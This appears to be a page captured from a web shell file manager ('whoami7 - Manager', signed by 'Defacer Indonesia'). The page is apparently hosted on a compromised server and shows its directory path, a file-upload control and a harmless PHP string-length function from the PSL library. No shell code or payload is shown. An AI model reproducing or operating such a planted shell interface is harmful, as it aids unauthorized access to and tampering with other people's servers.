whoami7 - Manager
:
/
home
/
kckglobal
/
www
/
portal
/
vendor
/
azjezz
/
psl
/
src
/
Psl
/
Str
/
Upload File:
files >> /home/kckglobal/www/portal/vendor/azjezz/psl/src/Psl/Str/length.php
<?php declare(strict_types=1); namespace Psl\Str; use function mb_strlen; /** * Returns the length of the given string, i.e. the number of bytes. * * Example: * * Str\length('Hello') * => Int(5) * * Str\length('سيف') * => Int(3) * * Str\length('تونس') * => Int(4) * * @pure * * @return int<0, max> */ function length(string $string, Encoding $encoding = Encoding::UTF_8): int { /** @var int<0, max> */ return mb_strlen($string, $encoding->value); }
Copyright ©2021 || Defacer Indonesia